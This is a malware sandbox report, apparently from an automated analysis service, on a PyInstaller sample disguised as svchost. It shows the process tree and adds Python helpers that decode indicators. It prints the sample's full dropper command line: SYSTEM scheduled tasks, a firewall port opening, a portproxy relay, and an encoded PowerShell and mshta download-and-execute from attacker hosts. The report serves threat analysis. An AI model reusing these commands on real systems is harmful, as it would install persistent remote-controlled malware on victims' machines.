Overview
Score: 10

Tasks (per-task score in the last column)
  Task          Sample           Resource   Platform        Score
  static1       svchost.bin.exe  -          -               3
  behavioral1   svchost.bin.exe  win7-jp    windows7_x64    10
  behavioral2   svchost.bin.exe  win7-fr    windows7_x64    10
  behavioral3   svchost.bin.exe  win7-en    windows7_x64    10
  behavioral4   svchost.bin.exe  win7-de    windows7_x64    10
  behavioral5   svchost.bin.exe  win11      windows11_x64   10
  behavioral6   svchost.bin.exe  win10-en   windows10_x64   9
  behavioral7   svchost.bin.exe  win10-jp   windows10_x64   -
  behavioral8   svchost.bin.exe  win10-fr   windows10_x64   10
  behavioral9   svchost.bin.exe  win10-en   windows10_x64   10
  behavioral10  svchost.bin.exe  win10-de   windows10_x64   10

Analysis (this report: resource win7-fr, i.e. behavioral2)
  max time kernel:   1757s
  max time network:  1759s
  platform:          windows7_x64
  resource:          win7-fr
  submitted:         04-09-2021 07:35
General
  Target:  svchost.bin.exe
  Size:    6.6MB
  MD5:     2787bb2d1ab223f8ac2692f3a8fd85fc
  SHA1:    dc34ee4e46ddea333cdc90e4aad7589cb8ee1ea0
  SHA256:  952e3e059251cd41e3c67006c5aa4b75fe3e6b0f18d96554b2d60d4ccfb78cb4
  SHA512:  d79bd7599ccb09fa72b939a506d04e28cb958e59c3987ab4d375e76337d5b1e33369d59397338aaeaf938c14ec9d93b20501d5224d151631c69c874d0657e9f3
Malware Config
Signatures

Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
  Note: the net.exe command lines captured in this run (net localgroup administrators; net group "domain admins" /domain) only enumerate group membership; no account or group change was observed.

Blocklisted process makes network request (1 IoC)
  flow 120092  pid 2388  powershell.EXE

Executes dropped EXE (6 IoCs)
  KnVAvdTx.exe  pids 2472, 2404, 2360, 2100, 2548, 2136

Modifies Windows Firewall (1 TTP)
  (netsh firewall add portopening tcp 65533 DNSd, netsh.exe pid 2672; see Processes)

Loads dropped DLL (64 IoCs)
  1576 svchost.bin.exe  x20
  2404 KnVAvdTx.exe     x20
  2100 KnVAvdTx.exe     x20
  2136 KnVAvdTx.exe     x4

Drops file in System32 directory (1 IoC)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.EXE

Drops file in Windows directory (2 IoCs)
  File created                  \??\c:\windows\KnVAvdTx.exe  cmd.exe
  File opened for modification  \??\c:\windows\KnVAvdTx.exe  cmd.exe

Detects Pyinstaller (3 IoCs)
  yara rule "pyinstaller" on behavioral2/files/0x0003000000012f46-134.dat, behavioral2/files/0x0003000000012f46-136.dat, behavioral2/files/0x0003000000012f46-138.dat
  Note: the sample is a PyInstaller one-file bundle. The first svchost.bin.exe (pid 2016) is the bootloader, which unpacks the Python runtime to a temporary directory and re-launches itself as pid 1576; that child is where the 20 "Loads dropped DLL" hits land.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Note: this is the engine's generic description for the rule; nothing else in this report (no file encryption, no ransom note) supports a ransomware classification.

Creates scheduled task(s) (1 TTP, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pids 1268, 328, 320  schtasks.exe

Gathers network information (2 TTPs, 3 IoCs)
  Uses commandline utility to view network configuration.
  1820 ipconfig.exe, 528 ipconfig.exe, 848 netstat.exe

Modifies data under HKEY_USERS (35 IoCs)
  All keys below are under \REGISTRY\USER\.DEFAULT, the hive used by the SYSTEM account; this is consistent with the processes running from the /ru system scheduled tasks rather than as the Admin user. MuiCache entries are under SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\.

  netsh.exe (18): MuiCache strings written when netsh loads its NAP helper DLLs (a side effect of running netsh, not attacker-controlled data)
    @%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"
    @%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"
    @%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"
    @%SystemRoot%\system32\napipsec.dll,-4 = "1.0"
    @%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"
    @%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"
    @%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"
    @%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"
    @%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"
    @%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
    @%SystemRoot%\system32\eapqec.dll,-102 = "1.0"
    @%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"
    @%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"
    @%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"
    @%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"
    @%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"
    LanguageList = 65006e002d0055005300000065006e0000000000 (set twice)

  WScript.exe (12)
    Key created       SOFTWARE\Microsoft
    Key created       SOFTWARE\Microsoft\Windows Script Host
    Key created       SOFTWARE\Microsoft\Windows Script Host\Settings
    Key created       Software
    Key created       Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
    Key created       Software\Microsoft\Windows Script Host\Settings
    Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
    Key created       Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
    Set value (data)  SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000000bad25860a1d701
    Set value (data)  SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000803fdc5860a1d701
    Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
    Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"

  cmd.exe (3)
    Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
    Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
    Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"

  powershell.EXE (2)
    Key created       SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
    Set value (data)  SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80346e7661a1d701

Runs net.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  1620 powershell.exe  x6
  2388 powershell.EXE  x1

Suspicious use of AdjustPrivilegeToken (43 IoCs)
  972 WMIC.exe (40 IoCs): the following 20 tokens, each adjusted twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  1620 powershell.exe  SeDebugPrivilege
  848 netstat.exe      SeDebugPrivilege
  2388 powershell.EXE  SeDebugPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
  Each parent -> child write is logged four times; the 16 distinct rows are (parent pid -> child pid, parent image, child target id):
    2016 -> 1576  svchost.bin.exe  29
    1576 -> 1656  svchost.bin.exe  32
    1656 -> 972   cmd.exe          33
    1576 -> 1688  svchost.bin.exe  34
    1688 -> 1308  cmd.exe          35
    1308 -> 1560  net.exe          36
    1576 -> 1380  svchost.bin.exe  37
    1380 -> 1624  cmd.exe          38
    1624 -> 1828  net.exe          39
    1576 -> 1620  svchost.bin.exe  40
    1576 -> 328   svchost.bin.exe  41
    328 -> 1820   cmd.exe          42
    1576 -> 528   svchost.bin.exe  43
    1576 -> 848   svchost.bin.exe  44
    2292 -> 2356  ZHUcKkVq.exe     46
    2356 -> 2308  cmd.exe          48
  Note: the listing is truncated at 64 entries, so it stops at WScript.exe (2308); the later cmd.exe, netsh.exe and schtasks.exe spawns appear only in the Processes tree.
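The WriteProcessMemory table is flat and repeats every row four times, so it is easier to read once rebuilt as a parent/child tree. The following is an added Python example, not part of the sandbox output: it parses the rows in the exact text form the report prints them, drops the repeats, and renders the tree with image names. The 16 rows and the leaf image names are copied from this report; the `* 4` reproduces the report's repetition so that the de-duplication is exercised.

```python
"""Added example (not sandbox output): rebuild the process tree from the
report's "Suspicious use of WriteProcessMemory" rows."""
import re
from collections import defaultdict

# The 16 distinct rows from the report, in the order printed.
ROWS = [
    "PID 2016 wrote to memory of 1576 2016 svchost.bin.exe 29",
    "PID 1576 wrote to memory of 1656 1576 svchost.bin.exe 32",
    "PID 1656 wrote to memory of 972 1656 cmd.exe 33",
    "PID 1576 wrote to memory of 1688 1576 svchost.bin.exe 34",
    "PID 1688 wrote to memory of 1308 1688 cmd.exe 35",
    "PID 1308 wrote to memory of 1560 1308 net.exe 36",
    "PID 1576 wrote to memory of 1380 1576 svchost.bin.exe 37",
    "PID 1380 wrote to memory of 1624 1380 cmd.exe 38",
    "PID 1624 wrote to memory of 1828 1624 net.exe 39",
    "PID 1576 wrote to memory of 1620 1576 svchost.bin.exe 40",
    "PID 1576 wrote to memory of 328 1576 svchost.bin.exe 41",
    "PID 328 wrote to memory of 1820 328 cmd.exe 42",
    "PID 1576 wrote to memory of 528 1576 svchost.bin.exe 43",
    "PID 1576 wrote to memory of 848 1576 svchost.bin.exe 44",
    "PID 2292 wrote to memory of 2356 2292 ZHUcKkVq.exe 46",
    "PID 2356 wrote to memory of 2308 2356 cmd.exe 48",
]
# The report prints each row four times in one flattened run of text; rebuild that.
WPM_TEXT = " ".join(row for row in ROWS for _ in range(4))

# Image names of pids that only ever appear as children, taken from the
# report's Processes section (the WPM rows only name the parent image).
LEAF_NAMES = {
    972: "WMIC.exe", 1560: "net1.exe", 1828: "net1.exe", 1620: "powershell.exe",
    1820: "ipconfig.exe", 528: "ipconfig.exe", 848: "netstat.exe", 2308: "WScript.exe",
}

# "PID <parent> wrote to memory of <child> <parent again> <parent image> <target id>"
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)")


def parse_wpm(text):
    """Return the distinct (parent, child, parent_image, target_id) rows, first-seen order."""
    seen, edges = set(), []
    for m in ROW_RE.finditer(text):
        row = (int(m.group(1)), int(m.group(2)), m.group(3), int(m.group(4)))
        if row not in seen:
            seen.add(row)
            edges.append(row)
    return edges


def build_tree(edges, leaf_names):
    """Return (roots, children, parent_of, names) built from the de-duplicated rows."""
    names = dict(leaf_names)
    children = defaultdict(list)
    parent_of = {}
    for parent, child, parent_image, _ in edges:
        names[parent] = parent_image          # parent image is given on every row
        parent_of[child] = parent
        children[parent].append(child)
    parents_in_order = list(dict.fromkeys(e[0] for e in edges))
    roots = [p for p in parents_in_order if p not in parent_of]
    return roots, children, parent_of, names


def render(roots, children, names, depth=0):
    """Indent two spaces per level; unknown images render as '?'."""
    lines = []
    for pid in roots:
        lines.append("  " * depth + f"{pid} {names.get(pid, '?')}")
        lines.extend(render(children.get(pid, []), children, names, depth + 1))
    return lines


if __name__ == "__main__":
    edges = parse_wpm(WPM_TEXT)
    roots, children, _, names = build_tree(edges, LEAF_NAMES)
    print("\n".join(render(roots, children, names)))
```

Two roots come out (2016 and 2292): the table holds no row that writes into ZHUcKkVq.exe, so the report does not show which process started it, and the tree ends at WScript.exe (2308) because the table is cut at 64 entries.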
Processes

[1] C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe  (PID 2016)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe  (PID 1576)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 1656)
            cmdline: cmd /c wmic ntdomain get domainname
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\Wbem\WMIC.exe  (PID 972)
                cmdline: wmic ntdomain get domainname
                - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 1688)
            cmdline: cmd /c net localgroup administrators
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net.exe  (PID 1308)
                cmdline: net localgroup administrators
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\SysWOW64\net1.exe  (PID 1560)
                    cmdline: C:\Windows\system32\net1 localgroup administrators

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 1380)
            cmdline: cmd /c net group "domain admins" /domain
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net.exe  (PID 1624)
                cmdline: net group "domain admins" /domain
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\SysWOW64\net1.exe  (PID 1828)
                    cmdline: C:\Windows\system32\net1 group "domain admins" /domain

        [3] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 1620)
            cmdline: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 328)
            cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\ipconfig.exe  (PID 1820)
                cmdline: ipconfig /all
                - Gathers network information

        [3] C:\Windows\SysWOW64\ipconfig.exe  (PID 528)
            cmdline: ipconfig /all
            - Gathers network information

        [3] C:\Windows\SysWOW64\netstat.exe  (PID 848)
            cmdline: netstat -na
            - Gathers network information
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\ZHUcKkVq.exe  (PID 2292)
    cmdline: C:\Windows\ZHUcKkVq.exe
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\cmd.exe  (PID 2356)
        cmdline: cmd /c call "c:\windows\temp\tmp.vbs"
        - Modifies data under HKEY_USERS
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\WScript.exe  (PID 2308)
            cmdline: "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            - Modifies data under HKEY_USERS

            [4] C:\Windows\SysWOW64\cmd.exe  (PID 2456)
                cmdline: "C:\Windows\System32\cmd.exe" /c echo QSjbOyJf >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\KnVAvdTx.exe&move /y c:\windows\temp\dig.exe c:\windows\TlWXsSY.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn KnVAvdTx /tr "C:\Windows\KnVAvdTx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\enkjrNu" /tr "c:\windows\TlWXsSY.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pKJUCCLUP"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\TlWXsSY.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\KnVAvdTx.exe"&schtasks /run /TN escan)
                - Drops file in Windows directory

                [5] C:\Windows\SysWOW64\netsh.exe  (PID 2672)
                    cmdline: netsh firewall add portopening tcp 65533 DNSd
                    - Modifies data under HKEY_USERS

                [5] C:\Windows\SysWOW64\netsh.exe  (PID 1720)
                    cmdline: netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                    - Modifies data under HKEY_USERS

                [5] C:\Windows\SysWOW64\schtasks.exe  (PID 320)
                    cmdline: schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                    - Creates scheduled task(s)

                [5] C:\Windows\SysWOW64\schtasks.exe  (PID 1268)
                    cmdline: schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn KnVAvdTx /tr "C:\Windows\KnVAvdTx.exe" /F
                    - Creates scheduled task(s)

                [5] C:\Windows\SysWOW64\schtasks.exe  (PID 328)
                    cmdline: schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\enkjrNu" /tr "c:\windows\TlWXsSY.exe" /F
                    - Creates scheduled task(s)

[1] C:\Windows\pnFJljJU.exe  (PID 1112)
    cmdline: C:\Windows\pnFJljJU.exe

[1] C:\Windows\system32\taskeng.exe  (PID 2560)
    cmdline: taskeng.exe {57BD7973-8D71-425C-B4A4-3021A67CAC3A} S-1-5-18:NT AUTHORITY\System:Service:

    [2] C:\Windows\KnVAvdTx.exe  (PID 2472)
        cmdline: C:\Windows\KnVAvdTx.exe
        - Executes dropped EXE

        [3] C:\Windows\KnVAvdTx.exe  (PID 2404)
            cmdline: C:\Windows\KnVAvdTx.exe
            - Executes dropped EXE
            - Loads dropped DLL

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 2388)
        cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
        - Blocklisted process makes network request
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\KnVAvdTx.exe  (PID 2360)
        cmdline: C:\Windows\KnVAvdTx.exe
        - Executes dropped EXE

        [3] C:\Windows\KnVAvdTx.exe  (PID 2100)
            cmdline: C:\Windows\KnVAvdTx.exe
            - Executes dropped EXE
            - Loads dropped DLL

    [2] C:\Windows\KnVAvdTx.exe  (PID 2548)
        cmdline: C:\Windows\KnVAvdTx.exe
        - Executes dropped EXE

        [3] C:\Windows\KnVAvdTx.exe  (PID 2136)
            cmdline: C:\Windows\KnVAvdTx.exe
            - Executes dropped EXE
            - Loads dropped DLL

Notes on the tree
  - The cmd.exe (PID 2456) command line is shown exactly as captured, except that the extraction had turned "&copy /y" into "©/y"; the original "copy /y c:\windows\temp\svchost.exe c:\windows\KnVAvdTx.exe" matches the "Drops file in Windows directory" IoC. The "echo QSjbOyJf >>" step appends a random string to the temp file before it is copied, which changes the file hash of the dropped KnVAvdTx.exe.
  - "netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53" makes the host accept TCP connections on port 65533 on every interface and relay them to 1.1.1.1:53 (a DNS-over-TCP relay); the preceding "netsh firewall add portopening tcp 65533 DNSd" opens that port in the Windows Firewall. portproxy rules survive reboots and are listed by "netsh interface portproxy show all".
  - The three schtasks.exe children create the Bluetool, KnVAvdTx and enkjrNu tasks, all with /ru system. The else branch of the command line (the Autocheck, Autostart and escan tasks and the mshta download from w.beahh.com) is only taken when WindowsPowerShell is absent and did not run here.
  - taskeng.exe (PID 2560) running as S-1-5-18 is the Task Scheduler engine executing those SYSTEM tasks: the KnVAvdTx.exe children are the KnVAvdTx task firing (each launch re-spawns itself and loads dropped DLLs), and powershell.EXE (PID 2388) is the Bluetool task firing the encoded download-and-execute command. No TlWXsSY.exe process (the enkjrNu task) appears in this run.
  - ZHUcKkVq.exe (PID 2292) and pnFJljJU.exe (PID 1112) appear as roots; the report does not show which process wrote or started them.
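The cmd.exe (PID 2456) command line above packs the whole persistence setup into one line, and the Bluetool task hides its real command behind PowerShell's -e encoding. The following is an added Python example, not part of the sandbox output: it decodes the -e payload and pulls the host IoCs (scheduled tasks with their run-as account and interval, the portproxy and firewall entries, dropped file paths and URLs) out of that command line. The regexes are this example's own; the base64 string and the command line are copied from the report, with the HTML-mangled "&copy" restored.

```python
"""Added example (not sandbox output): decode the -e payload and extract host
IoCs from the dropper command line captured in this report (cmd.exe, PID 2456)."""
import base64
import re

# Copied from the report: the -e argument of the "\Microsoft\windows\Bluetool" task.
ENCODED_COMMAND = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgA"
    "aAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="
)

# Copied from the report (cmd.exe PID 2456), with "&copy /y" restored.
DROPPER_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c echo QSjbOyJf >> c:\windows\temp\svchost.exe'
    r'&echo "*" >c:\windows\temp\ipc.txt'
    r'&netsh firewall add portopening tcp 65533 DNSd'
    r'&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53'
    r'&copy /y c:\windows\temp\svchost.exe c:\windows\KnVAvdTx.exe'
    r'&move /y c:\windows\temp\dig.exe c:\windows\TlWXsSY.exe'
    r'&if exist C:/windows/system32/WindowsPowerShell/ ('
    r'schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" '
    r'/tr "powershell -ep bypass -e ' + ENCODED_COMMAND + r'" /F'
    r'&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn KnVAvdTx /tr "C:\Windows\KnVAvdTx.exe" /F'
    r'&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\enkjrNu" /tr "c:\windows\TlWXsSY.exe" /F'
    r') else ('
    r'start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING'
    r'&&schtasks /delete /TN Autocheck /f'
    r'&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pKJUCCLUP"'
    r'&schtasks /run /TN Autocheck'
    r'&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING'
    r'&&schtasks /delete /TN Autostart /f'
    r'&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\TlWXsSY.exe"'
    r'&schtasks /run /TN Autostart'
    r'&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING'
    r'&&schtasks /delete /TN escan /f'
    r'&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\KnVAvdTx.exe"'
    r'&schtasks /run /TN escan)'
)

# Regexes written for this example (case-insensitive: the else branch uses /TN and /ST).
TASK_RE = re.compile(
    r'schtasks\s+/create\s+(?P<opts>.*?)/tn\s+"?(?P<name>[^"\s]+)"?\s+/tr\s+"(?P<cmd>[^"]*)"', re.I)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
PORTPROXY_RE = re.compile(
    r"portproxy\s+add\s+v4tov4\s+listenport=(\d+)\s+connectaddress=(\S+)\s+connectport=(\d+)", re.I)
FIREWALL_RE = re.compile(r"netsh\s+firewall\s+add\s+portopening\s+(\w+)\s+(\d+)\s+([^\s&]+)", re.I)
REDIRECT_RE = re.compile(r">>?\s*([^\s&|>]+)")            # targets of echo ... > / >>
COPYMOVE_RE = re.compile(r"\b(?:copy|move)\s+/y\s+(\S+)\s+([^\s&]+)", re.I)
URL_RE = re.compile(r"""https?://[^\s"')]+""")


def decode_encoded_command(b64: str) -> str:
    """PowerShell -e takes base64 of the script text encoded as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def extract_iocs(cmdline: str) -> dict:
    """Pull persistence and network IoCs out of a cmd.exe one-liner."""
    tasks = []
    for m in TASK_RE.finditer(cmdline):
        run_as = re.search(r"/ru\s+(\S+)", m["opts"], re.I)
        sched = re.search(r"/sc\s+(\S+)\s+/mo\s+(\d+)", m["opts"], re.I)
        enc = ENC_RE.search(m["cmd"])
        tasks.append({
            "name": m["name"],
            "run_as": run_as.group(1) if run_as else None,
            "every": f"{sched.group(2)} {sched.group(1)}" if sched else None,
            "command": m["cmd"],
            "decoded": decode_encoded_command(enc.group(1)) if enc else None,
        })
    urls = set(URL_RE.findall(cmdline))
    for t in tasks:                      # URLs only visible after decoding
        if t["decoded"]:
            urls.update(URL_RE.findall(t["decoded"]))
    dropped = set(REDIRECT_RE.findall(cmdline)) | {dst for _, dst in COPYMOVE_RE.findall(cmdline)}
    return {
        "scheduled_tasks": tasks,
        "portproxy": PORTPROXY_RE.findall(cmdline),   # (listenport, connectaddress, connectport)
        "firewall": FIREWALL_RE.findall(cmdline),     # (protocol, port, rule name)
        "dropped_files": sorted(dropped),
        "urls": sorted(urls),
    }


if __name__ == "__main__":
    print("decoded -e payload:", decode_encoded_command(ENCODED_COMMAND))
    for key, value in extract_iocs(DROPPER_CMDLINE).items():
        print(f"{key}:")
        for item in value:
            print("   ", item)
```

The decoded Bluetool payload is IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN): every 50 minutes, as SYSTEM, the host fetches and executes whatever the server returns for a URL that carries the victim's domain name, so the downloaded stage is never written to disk and is not captured by this report. Note that the extractor lists all six task names even though only three were created in this run; which branch of the if/else actually executed has to be read from the Processes tree, not from the command line alone.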